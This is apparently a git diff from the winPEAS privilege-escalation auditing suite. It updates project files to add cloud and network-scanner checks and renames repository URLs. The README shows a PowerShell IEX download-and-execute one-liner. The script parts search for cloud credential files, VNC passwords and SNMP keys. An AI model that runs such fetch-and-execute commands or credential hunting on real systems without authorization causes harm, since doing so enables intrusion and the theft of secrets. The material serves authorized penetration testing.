<HintPath>..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll</HintPath>
<Private>True</Private>
<Private>True</Private>
</Reference>
</ItemGroup>
<ItemGroup>
<Compile Include="3rdParty\AlphaFS\Device\ChangeErrorMode.cs" />
@@ -1002,6 +1182,7 @@
<Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" />
<Compile Include="Checks\ApplicationsInfo.cs" />
<Compile Include="Checks\BrowserInfo.cs" />
<Compile Include="Checks\CloudInfo.cs" />
<Compile Include="Checks\FileAnalysis.cs" />
<Compile Include="Checks\FilesInfo.cs" />
<Compile Include="Checks\Globals.cs" />
@@ -1038,6 +1219,12 @@
<Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" />
<Compile Include="Info\ApplicationInfo\InstalledApps.cs" />
<Compile Include="Helpers\Beaprint.cs" />
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GWorkspaceInfo.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
<Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
<Compile Include="Info\EventsInfo\Logon\Logon.cs" />
<Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" />
@@ -1058,7 +1245,7 @@
<Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\WSL\WSL.cs" />
<Compile Include="Info\FilesInfo\WSL\WSLHelper.cs" />
<Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" />
<Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" />
<Compile Include="Info\NetworkInfo\Enums\Protocol.cs" />
@@ -1068,6 +1255,10 @@
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" />
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" />
<Compile Include="Info\NetworkInfo\NetworkConnection.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetPinger.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkUtils.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkScanner.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\PortScanner.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" />
@@ -1317,9 +1508,9 @@
<EmbeddedResource Include="Properties\Resources.zh-CN.resx" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include=".NETFramework,Version=v4.5.2">
<BootstrapperPackage Include=".NETFramework,Version=v4.8">
<Visible>False</Visible>
<ProductName>Microsoft .NET Framework 4.5.2 %28x86 and x64%29</ProductName>
<ProductName>Microsoft .NET Framework 4.8 %28x86 and x64%29</ProductName>
<Install>true</Install>
</BootstrapperPackage>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
@@ -1329,5 +1520,25 @@
</BootstrapperPackage>
</ItemGroup>
<ItemGroup />
<ItemGroup>
<EmbeddedResource Include="costura32\SQLite.Interop.dll" />
<EmbeddedResource Include="costura64\SQLite.Interop.dll" />
<Content Include="FodyWeavers.xml" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.props'))" />
<Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.targets'))" />
<Error Condition="!Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets'))" />
<Error Condition="!Exists('..\packages\Fody.6.5.5\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.5.5\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.5.7.0\build\Costura.Fody.props'))" />
<Error Condition="!Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets'))" />
</Target>
<Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.targets" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" />
<Import Project="..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets" Condition="Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" />
<Import Project="..\packages\Fody.6.5.5\build\Fody.targets" Condition="Exists('..\packages\Fody.6.5.5\build\Fody.targets')" />
<Import Project="..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets" Condition="Exists('..\packages\Costura.Fody.5.7.0\build\Costura.Fody.targets')" />
</Project>

2
winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
View File

@@ -5,7 +5,7 @@
</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>fileanalysis debug</StartArguments>
<StartArguments>cloudinfo</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<StartArguments>debug</StartArguments>

10
winPEAS/winPEASps1/README.md
View File

@@ -1,6 +1,6 @@
# Windows Privilege Escalation Awesome Script (.ps1)
![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/images/winpeas.png)
![](https://github.com/peass-ng/PEASS-ng/raw/master/winPEAS/winPEASexe/images/winpeas.png)
**WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
@@ -12,15 +12,13 @@ The official **maintainer of this script is [RandolphConley](https://github.com/
## Quick Start
Download the **[latest releas from here](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
```
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

12
winPEAS/winPEASps1/winPEAS.ps1
View File

@@ -19,10 +19,10 @@
.NOTES
Version: 1.3
PEASS-ng Original Author: carlospolop
PEASS-ng Original Author: PEASS-ng
winPEAS.ps1 Author: @RandolphConley
Creation Date: 10/4/2022
Website: https://github.com/carlospolop/PEASS-ng
Website: https://github.com/peass-ng/PEASS-ng
TESTED: PoSh 5,7
UNTESTED: PoSh 3,4
@@ -245,11 +245,11 @@ Write-Color "(((((((((. ,(############################(../(((((((((." -Color Gre
Write-Color " (((((((((/, ,####################(/..((((((((((." -Color Green
Write-Color " (((((((((/,. ,*//////*,. ./(((((((((((." -Color Green
Write-Color " (((((((((((((((((((((((((((/" -Color Green
Write-Color " by CarlosPolop & RandolphConley" -Color Green
Write-Color " by PEASS-ng & RandolphConley" -Color Green
######################## VARIABLES ########################
# Manually added Regex search strings from https://github.com/carlospolop/PEASS-ng/blob/master/build_lists/sensitive_files.yaml
# Manually added Regex search strings from https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml
# Set these values to true to add them to the regex search by default
$password = $true
@@ -810,7 +810,7 @@ if ( Test-Path "HKCU:\Software\ORL\WinVNC3\Password") { Write-Host " WinVNC foun
Write-Host ""
if ($TimeStamp) { TimeElapsed }
Write-Host -ForegroundColor Blue "=========|| Checking for SNMP Passwords"
if ( Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\SNMP" ) { Write-Host "SNPM Key found at HKLM:\SYSTEM\CurrentControlSet\Services\SNMP" }else { Write-Host "No SNPM found." }
if ( Test-Path "HKLM:\SYSTEM\CurrentControlSet\Services\SNMP" ) { Write-Host "SNMP Key found at HKLM:\SYSTEM\CurrentControlSet\Services\SNMP" }else { Write-Host "No SNMP found." }
Write-Host ""
@@ -1284,7 +1284,7 @@ $CCreds = @(".aws\credentials",
".azure\azureProfile.json")
foreach ($u in $users) {
$CCreds | ForEach-Object {
if (Test-Path "c:\$u\$_") { Write-Host "$_ found!" -ForegroundColor Red }
if (Test-Path "c:\Users\$u\$_") { Write-Host "$_ found!" -ForegroundColor Red }
}
}